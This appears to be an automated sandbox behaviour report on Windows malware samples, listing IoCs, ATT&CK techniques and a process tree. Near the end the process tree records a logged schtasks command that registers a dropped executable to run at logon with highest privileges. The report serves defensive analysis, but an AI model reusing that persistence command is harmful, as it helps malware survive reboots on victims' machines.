Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	powershell_ise.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	powershell_ise.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	powershell_ise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	powershell_ise.exe

NTFS ADS 2 IoCs

Processes:

firefox.exemsedge.exe

description	ioc	Process
File created	C:\Users\Admin\Downloads\execution.ps1:Zone.Identifier	firefox.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 554362.crdownload:SmartScreen	msedge.exe

Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
7400	PING.EXE
4072	PING.EXE
2156	PING.EXE
5464	PING.EXE
4364	PING.EXE
5364	PING.EXE
5268	PING.EXE
5080	PING.EXE
488	PING.EXE
2908	PING.EXE
3508	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
4308	schtasks.exe
3224	schtasks.exe
2004	schtasks.exe
548	schtasks.exe
5304	schtasks.exe
4072	schtasks.exe
2640	schtasks.exe
1720	schtasks.exe
3132	schtasks.exe
7244	schtasks.exe
7084	schtasks.exe
3892	schtasks.exe
1776	schtasks.exe
4888	schtasks.exe
4048	schtasks.exe
1860	schtasks.exe
4952	schtasks.exe
3212	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell_ise.exeaa.exetaskmgr.exeatat.exe

pid	Process
452	msedge.exe
452	msedge.exe
2876	msedge.exe
2876	msedge.exe
4296	identity_helper.exe
4296	identity_helper.exe
2904	msedge.exe
2904	msedge.exe
4272	powershell_ise.exe
4272	powershell_ise.exe
4272	powershell_ise.exe
4272	powershell_ise.exe
4272	powershell_ise.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
2080	aa.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe
1956	atat.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

powershell_ise.exe7zFM.exeOpenWith.exehelp.scr

pid	Process
4272	powershell_ise.exe
5072	7zFM.exe
556	OpenWith.exe
3316	help.scr

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

Processes:

msedge.exe

pid	Process
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell_ise.exefirefox.exesvchost.exe7zFM.exeaa.exeatat.exetaskmgr.exetaskmgr.exeaa.exenobody.exenobody.exestart.exeTutorial.exexs.exeLoader.exesaloader.exeSystem32.exeaidans.dont.run.exeoutput.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exe

description	pid	Process
Token: SeDebugPrivilege	4272	powershell_ise.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeBackupPrivilege	2748	svchost.exe
Token: SeRestorePrivilege	2748	svchost.exe
Token: SeSecurityPrivilege	2748	svchost.exe
Token: SeTakeOwnershipPrivilege	2748	svchost.exe
Token: 35	2748	svchost.exe
Token: SeRestorePrivilege	5072	7zFM.exe
Token: 35	5072	7zFM.exe
Token: SeSecurityPrivilege	5072	7zFM.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2256	firefox.exe
Token: SeDebugPrivilege	2080	aa.exe
Token: SeDebugPrivilege	1956	atat.exe
Token: SeDebugPrivilege	444	taskmgr.exe
Token: SeSystemProfilePrivilege	444	taskmgr.exe
Token: SeCreateGlobalPrivilege	444	taskmgr.exe
Token: SeDebugPrivilege	2036	taskmgr.exe
Token: SeSystemProfilePrivilege	2036	taskmgr.exe
Token: SeCreateGlobalPrivilege	2036	taskmgr.exe
Token: SeDebugPrivilege	4304	aa.exe
Token: SeDebugPrivilege	4720	nobody.exe
Token: SeDebugPrivilege	2944	nobody.exe
Token: SeDebugPrivilege	3516	start.exe
Token: SeDebugPrivilege	2820	Tutorial.exe
Token: SeDebugPrivilege	2812	xs.exe
Token: SeDebugPrivilege	2636	Loader.exe
Token: SeDebugPrivilege	1832	saloader.exe
Token: SeDebugPrivilege	4736	System32.exe
Token: SeDebugPrivilege	4620	aidans.dont.run.exe
Token: SeDebugPrivilege	4620	aidans.dont.run.exe
Token: SeDebugPrivilege	436	output.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeIncreaseQuotaPrivilege	4304	wmic.exe
Token: SeSecurityPrivilege	4304	wmic.exe
Token: SeTakeOwnershipPrivilege	4304	wmic.exe
Token: SeLoadDriverPrivilege	4304	wmic.exe
Token: SeSystemProfilePrivilege	4304	wmic.exe
Token: SeSystemtimePrivilege	4304	wmic.exe
Token: SeProfSingleProcessPrivilege	4304	wmic.exe
Token: SeIncBasePriorityPrivilege	4304	wmic.exe
Token: SeCreatePagefilePrivilege	4304	wmic.exe
Token: SeBackupPrivilege	4304	wmic.exe
Token: SeRestorePrivilege	4304	wmic.exe
Token: SeShutdownPrivilege	4304	wmic.exe
Token: SeDebugPrivilege	4304	wmic.exe
Token: SeSystemEnvironmentPrivilege	4304	wmic.exe
Token: SeRemoteShutdownPrivilege	4304	wmic.exe
Token: SeUndockPrivilege	4304	wmic.exe
Token: SeManageVolumePrivilege	4304	wmic.exe
Token: 33	4304	wmic.exe
Token: 34	4304	wmic.exe
Token: 35	4304	wmic.exe
Token: 36	4304	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exefirefox.exe7zFM.exeNOTEPAD.EXEpowershell_ise.exetaskmgr.exe

pid	Process
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
5072	7zFM.exe
5072	7zFM.exe
5072	7zFM.exe
1404	NOTEPAD.EXE
4272	powershell_ise.exe
444	taskmgr.exe
444	taskmgr.exe

Suspicious use of SendNotifyMessage 60 IoCs

Processes:

msedge.exefirefox.exetaskmgr.exetaskmgr.exeRuntime Broker.exe

pid	Process
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2876	msedge.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
444	taskmgr.exe
2036	taskmgr.exe
4544	Runtime Broker.exe

Suspicious use of SetWindowsHookEx 24 IoCs

Processes:

firefox.exepowershell_ise.exeOpenWith.exeatat.exehelp.scrhelp.scrnobody.exe2HIf.exeSMB.exe2HIf.exe2HIf.exe

pid	Process
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
2256	firefox.exe
4272	powershell_ise.exe
4272	powershell_ise.exe
4272	powershell_ise.exe
556	OpenWith.exe
556	OpenWith.exe
556	OpenWith.exe
556	OpenWith.exe
556	OpenWith.exe
556	OpenWith.exe
556	OpenWith.exe
556	OpenWith.exe
556	OpenWith.exe
1956	atat.exe
3316	help.scr
2168	help.scr
4720	nobody.exe
4952	2HIf.exe
1944	SMB.exe
5196	2HIf.exe
5292	2HIf.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	Process	procid_target
PID 2876 wrote to memory of 1316	2876	msedge.exe	82
PID 2876 wrote to memory of 1316	2876	msedge.exe	82
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 3628	2876	msedge.exe	83
PID 2876 wrote to memory of 452	2876	msedge.exe	84
PID 2876 wrote to memory of 452	2876	msedge.exe	84
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85
PID 2876 wrote to memory of 3892	2876	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
1052	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://buzzheavier.com/zpxca2zcg07d
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6dfa46f8,0x7ffa6dfa4708,0x7ffa6dfa4718
  2⤵
  PID:1316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
  2⤵
  PID:3628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
  2⤵
  PID:3892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:1880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
  2⤵
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
  2⤵
  PID:3108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:2644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
  2⤵
  PID:676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
  2⤵
  PID:3996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4844 /prefetch:8
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,17531182527076390265,8538736348745678147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6288 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1248

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\Admin\Downloads\take3.ps1"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4272
- C:\Users\Admin\Downloads\UrlHausFiles\aa.exe
  "C:\Users\Admin\Downloads\UrlHausFiles\aa.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"' & exit
    3⤵
    PID:4152
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7FC1.tmp.bat""
    3⤵
    PID:492
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4188
  - - C:\Users\Admin\AppData\Roaming\atat.exe
      "C:\Users\Admin\AppData\Roaming\atat.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1956

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3464
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2256
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1298ebd1-17ea-40c4-8a60-630e29cbbb5f} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" gpu
    3⤵
